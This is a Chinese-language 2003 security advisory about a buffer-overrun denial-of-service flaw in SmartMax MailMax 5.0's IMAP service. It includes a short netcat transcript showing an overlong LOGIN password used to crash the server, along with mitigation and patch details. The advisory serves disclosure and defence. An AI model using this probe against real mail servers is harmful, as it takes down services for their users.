发布日期：2003-04-11
更新日期：2003-04-17

受影响系统：

SmartMax Software MailMax 5.0.10.7
SmartMax Software MailMax 5.0.10.6
SmartMax Software MailMax 5.0

不受影响系统：

SmartMax Software MailMax 5.5
SmartMax Software MailMax 5.0.10.8

描述：

---

BUGTRAQ  ID: 7326

MailMax是一款扩展性强的支持SMTP、IMAP4和POP3协议的EMAIL服务器，它的TCP/IP GUI允许服务器管理员从Internet连接服务器。

MailMax实现的IMAP协议对超长密码缺少正确处理，远程攻击者可以利用这个漏洞对Email服务程序进行拒绝服务攻击。

当攻击者使用IMAP协议连接TCP 143端口后，在登录过程中提交超长密码字符串，系统就会出现如下错误信息：

"Buffer overrun detected! - Program: <PATH>\IMAPMax.exe"

导致服务崩溃，拒绝正常的邮件请求，需要手工启动服务程序。

<*来源：Dennis Rand （DER@cowi.dk）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=105012958618890&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Dennis Rand （DER@cowi.dk）提供了如下测试方法：

----------------------------- [Transcript] -----------------------------
nc 127.0.0.1 143
* OK IMAP4rev1 SmartMax IMAPMax 5 Ready
0000 CAPABILITY
* CAPABILITY IMAP4rev1
0000 OK CAPABILITY completed
0001 LOGIN "mail@mail.com" "A..[50] ..A"
0001 NO Invalid user name or password.
0001 NO Invalid user name or password.

----------------------------- [Transcript] -----------------------------

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 关闭IMAP4rev1 SmartMax IMAPMax 5服务。

厂商补丁：

SmartMax Software
-----------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

SmartMax Software Upgrade MailMax 5 Files
ftp://ftp.smartmax.com/updates/MailMax 5.0/

浏览次数：3185
严重程度：0（网友投票）